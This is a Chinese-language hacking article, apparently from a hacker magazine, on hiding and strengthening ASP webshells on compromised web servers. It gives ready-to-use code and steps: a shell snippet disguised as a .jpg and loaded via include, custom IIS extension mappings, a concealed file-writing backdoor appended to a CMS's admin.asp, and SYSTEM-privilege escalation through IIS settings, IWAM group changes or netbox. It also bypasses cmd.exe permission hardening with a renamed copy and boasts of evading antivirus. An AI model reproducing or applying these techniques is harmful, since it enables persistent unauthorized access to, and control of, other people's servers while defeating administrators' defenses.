突破常規限制運行Asp***

腳本***中往往會上傳一個asp***來進一步擴大權限，或者在肉雞中留一個asp後門也是一個不錯的選擇。但是如何讓asp***更加隱匿和強大，從而躲過網管查殺逃過殺毒軟件追殺，並且具備system權限呢？改變代碼變量也許是一個解決問題的辦法，但是我們不如換個角度思考，何不嘗試改變asp***的運行方式？
首先，我們可以換個任意後綴來運行asp***。換任意後綴來運行asp文件方法有兩種，一種是include指令的使用。include指令可以讓我們直接調用位於其它文件的函數，而不管後綴名是什麼。像我寫了一個簡單的asp***，功能是遍歷c:盤，源碼如下：

<%Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run ("cmd.exe /c dir c:\ > c:\lcx.txt ") %>

我們可以將這段源碼保存成1.jpg，然後將這句指令<!--#include file="1.jpg"-->放在2.asp文件的文件頭或文件尾，那麼我們執行2.asp時，放在2.asp同目錄下的1.jpg同樣也會被調用，起到遍歷c:的功能即在c:下生成lcx.txt這一文件。第二種方法是iis管理器中用asp.dll來解析任意後綴。在iis默認安裝情況下，我們可以查覺asa、cer、cdx後綴也可以成功運行asp代碼，因爲這三種後綴的文件映射都是調用了系統的asp.dll。根據這一啓示，我們可以做一個.lcx的後綴映射，用nt\system32下的asp.dll來解析，這樣做完後寫有asp源碼的lcx後綴文件也會成功運行asp程序。其方法是依次打開電腦的控制面板－管理工具－Internet 服務管理器－web站點－右鍵屬性－主目錄－配置－添加。
其次，我們可以讓asp***來觸發才運行。無論你的asp***寫得多麼好，基本總會調用到WSCRIPT.SHELL和Scripting.FileSystemObject這兩個對象。有經驗的網管可以運行查找功能，讓你的***無處可逃。（這裏我也順便給大家提供一個啓明星工作室編寫的查找asp***的工具，見附件）我們能不能做到調用這兩個對象的asp***不放在肉雞上，需要時能夠隨時上傳運行呢？runasp.asp是一個用asp實現asp文件的運行的腳本，雖然還有很多bug，但是對我們調用執行asp***是足夠用了。更爲可怕的是我在runasp.asp裏調用測試一些惡意代碼時，居然躲過了瑞星的查殺。圖2。（由於runasp.asp代碼太多，文章裏不方便列出，我已將其放在附件裏了，大家可以自己研究一下）我們將runasp.asp放在肉雞上是不是一個很好的asp觸發器後門呢？另外，對付粗心的網管我們還可以將這樣一段代碼放在asp文件裏：
<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你要插入的asp文件名?id=1">
<input type="text" size="20" name="Name"
value=<%=server.mappath("xp.asp")%>>
<textarea name="Message" class=input>
</textarea>
<input type="submit" name="Send" value="生成" class=input>
</form>
<% end if%>
像我放在動網文章的admin.asp的文件尾端，當網管運行http://動網文章url/admin.asp時並沒有引起絲毫變化，而當我們運行http://動網文章url/admin.asp?id=1時，就可以根據我們的需要生成任意asp***文件了。
最後，我們要讓asp***具備系統權限。我們的***現在隱匿得很深，躲過了細心網管和殺毒軟件，不具備系統權限我們心有不甘。讓asp***具備系統權限的方法有三種，第一種是在iis管理器中的主目錄選項裏將應用程序保護選擇爲:低(iis進程)圖3。第二種是將"IWAM_machine"這一用戶加入administrators組即可。這兩種方法我想大家也許都耳熟能詳了，但第3種也許就不爲人所知了。netbox是一款由北京綜藝達軟件技術有限公司自主研製的編譯及開發工具，除了Apache和微軟的IIS以外，目前是世界上第三個可以運行asp的應用服務器，在Windows98/NT/2000/Me/XP下都可以直接運行，而且是一個大小僅爲440kb的綠色文件。我已將netbox配置好了（請見附件的netbox文件夾)，大家使用的時候，只需將netbox文件夾放在某個盤符下，再在cmd下運行"x:\netbox\netbox.exe -install"即可安裝成功netbox，以後就可以運行[url]http://ip:88/x.asp[/url]了。需要指出的是我在netbox的配置文件裏main.box裏寫了這樣兩行代碼：
If httpd.Create("", 88) = 0 Then
Set host = httpd.AddHost("", "\wwwroot")
意思是web的端口爲88，asp文件放在netbox目錄下的wwwroot文件夾。這個端口和文件夾，你都可以根據自己的需要用記事本打開main.box來修改你所想要的。我們使用這一軟件最大的一個好處是我們的asp***在netbox環境下具備了系統權限，也許用它在肉雞上做主頁留後門也是一個不錯的選擇喲。
另外，因爲我整篇文章寫得是如何突破常規限制來運行asp***，所以還有一點我要提及。在***防線2003年7期xhacker有篇文章《巧妙設置cmd權限加強主機安全配置》提到過防止網上流行的cmd.asp***（見附件）方法是可以用
cacls %systemroot/system32/cmd.exe /E /D IUSR_machine
cacls %systemroot/system32/dllcache/cmd.exe /E /D IUSR_machine
這樣兩條命令來限止cmd.exe的權限，於是cmd.asp***就失去作用了。針對這種限制我們也有辦法突破，我們可以將本機的cmd.exe改名傳到肉雞上，假設我們將cmd.exe改名爲lcx.exe，傳在肉雞的d:\lcx目錄下，於是我們打開cmd.asp, 找到
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)這一行源碼，改爲
Call oScript.Run ("d:\lcx\lcx.exe /c " & szCMD & " > " & szTempFile, 0, True)即可，我們又可以成功運行cmd.asp了。
總之，如何能更好地運行asp***，發揮出它的強大功能，還是需要我們多動腦多動手，只有這樣我們纔會有新的發現